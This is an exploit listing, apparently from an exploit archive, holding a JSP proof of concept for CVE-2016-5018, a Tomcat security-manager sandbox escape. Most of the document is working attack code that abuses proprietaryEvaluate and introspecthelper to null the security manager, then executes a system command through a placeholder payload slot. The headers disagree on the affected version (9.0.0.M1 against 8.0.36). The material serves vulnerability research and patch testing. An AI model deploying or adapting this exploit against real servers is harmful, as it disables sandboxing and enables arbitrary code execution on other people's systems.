Tomcat 9.0.0.M1 Sandbox Escape

Tomcat version 9.0.0.M1 proprietaryEvaluate sandbox escape proof of concept.

MD5 | d33e30810a886a7412766894d0f80db3

Download

# Exploit Title: Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape
# Date: 2020-01-07
# Exploit Author: Harrison Neal, PatchAdvisor
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.36/bin/apache-tomcat-8.0.36.exe
# Version: 8.0.36
# Description: Tomcat proprietaryEvaluate/introspecthelper Sandbox Escape
# Tested on: Windows 
# CVE: CVE-2016-5018
 /*   
# See https://tomcat.apache.org/tomcat-8.0-doc/security-manager-howto.html for more information about the default sandbox.   
# When Tomcat 8 is configured to run as a service, you can use the Tomcat8w.exe tool to enable/disable the security manager.
# In the Java tab, add the following options:
# -Djava.security.manager
# -Djava.security.policy=C:\Program Files\Apache Software Foundation\Tomcat 8.0\conf\catalina.policy
 */
 
 <%@ page import="java.util.*,java.io.*,org.apache.jasper.runtime.*,java.lang.reflect.*"%>
<%   
    SecurityManager sm = System.getSecurityManager();
    
    if (sm != null) {
        try {
            ProtectedFunctionMapper pfm = ProtectedFunctionMapper.getInstance();

            { // Tomcat 7+
                // Get the desired method
                Method[] methods = (Method[]) PageContextImpl.proprietaryEvaluate(
                        "${pageContext.getServletContext().getClass().getDeclaredMethods()}",
                        Method[].class, pageContext, pfm /*, false*/); // Uncomment "false" parameter for Tomcat 7

                Method theMethod = null;

                for (Method m : methods) {
                    if ("executeMethod".equals(m.getName())) {
                        theMethod = m;
                        break;
                    }
                }

                // Set it to accessible
                JspRuntimeLibrary.introspecthelper(
                        theMethod,
                        "accessible",
                        "true",
                        request,
                        null,
                        false);

                // Run it
                theMethod.invoke(pageContext.getServletContext(),
                        System.class.getMethod("setSecurityManager", new Class[]{SecurityManager.class}),
                        null,
                        new Object[]{null}
                );
            }
            
            /*{ // Tomcat 5.5 and 6
                pfm.mapFunction("hello:world", System.class, "setSecurityManager", new Class[] { SecurityManager.class });
                PageContextImpl.proprietaryEvaluate("${hello:world(null)}", Object.class, pageContext, pfm, false);
            }*/
            
        } catch (Throwable ex) {
            PrintWriter pw = new PrintWriter(out);
            ex.printStackTrace(pw);
            pw.flush();
        }
    }
    
    // Your payload goes here
    try {
        Runtime.getRuntime().exec("calc");
    } catch (Throwable ex) {
        PrintWriter pw = new PrintWriter(out);
        ex.printStackTrace(pw);
        pw.flush();
    }
    
    // Optional put the security manager back
    if (sm != null) {
        System.setSecurityManager(sm);
    }
%>

Source: packetstormsecurity.com